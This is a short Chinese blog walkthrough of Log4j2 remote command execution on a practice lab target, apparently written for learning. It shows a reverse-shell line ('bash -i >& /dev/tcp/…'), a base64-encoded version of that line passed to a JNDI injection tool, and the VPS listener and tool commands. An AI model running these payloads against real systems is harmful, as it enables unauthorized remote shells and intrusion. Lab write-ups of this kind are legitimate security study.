vlambda博客
学习文章列表

某靶场Log4j2远程命令执行

        最近一直在跟众多师傅们一起打某个靶场玩,发现还是有点意思的。所以特意呢打算更新几个这样的文章来供大家看看。


    废话不多说我们直接开始吧。

  

    所用到的工具:JNDIExploit-1.3-SNAPSHOT.jar


    某靶场 

 长这样


vps中启动工具

某靶场Log4j2远程命令执行

java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1234 -p 35532 -i 0.0.0.0

直接构造payload,获得flag(JNDIExploit-1.3-SNAPSHOT.jar工具poc 以/TomcatBypass/TomcatEcho结尾)

某靶场Log4j2远程命令执行

第二个 稍微有点复杂 触发点不一样

先抓包

某靶场Log4j2远程命令执行

vps启动工具

bash -i >& /dev/tcp/ip/1234 0>&1 命令需要在https://www.jackson-t.ca/runtime-exec-payloads.html进行编码

某靶场Log4j2远程命令执行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}” -A IP

某靶场Log4j2远程命令执行

vps开启监听

某靶场Log4j2远程命令执行

burp构造payload

某靶场Log4j2远程命令执行

发现服务器监听无信息返回,添加Content-Type头

Content-Type:application/x-www-form-urlencoded

某靶场Log4j2远程命令执行

添加后

成功反弹


特别声明:

       由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。


        作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。切勿用于非法,仅供学习参考


我不会渗透,我们下次再见。